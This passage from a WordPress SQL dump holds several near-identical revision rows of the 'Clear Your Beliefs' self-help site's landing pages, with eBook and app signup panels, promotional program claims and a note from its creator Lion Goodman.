journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:23:16', '2014-11-20 05:23:16', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1823, 2, '2014-11-20 00:17:34', '2014-11-20 05:17:34', '<h1 class="su-post-title">307601254</h1>\nPosted: November 19, 2014 | <a href="http://clearyourbeliefs.com/?attachment_id=1798#comments" class="su-post-comments-link">0 comments</a>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4">http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:17:34', '2014-11-20 05:17:34', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1830, 2, '2014-11-20 01:36:02', '2014-11-20 06:36:02', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 01:36:02', '2014-11-20 06:36:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1826, 2, '2014-11-20 00:35:20', '2014-11-20 05:35:20', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:35:20', '2014-11-20 05:35:20', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1827, 2, '2014-11-20 01:00:15', '2014-11-20 06:00:15', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 74px;font-size: 16px;line-height: 20px;padding-bottom: 23px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 01:00:15', '2014-11-20 06:00:15', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1829, 2, '2014-11-20 01:25:30', '2014-11-20 06:25:30', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 74px;font-size: 16px;line-height: 20px;padding-bottom: 23px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 01:25:30', '2014-11-20 06:25:30', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1828, 2, '2014-11-20 01:21:49', '2014-11-20 06:21:49', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 01:21:49', '2014-11-20 06:21:49', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
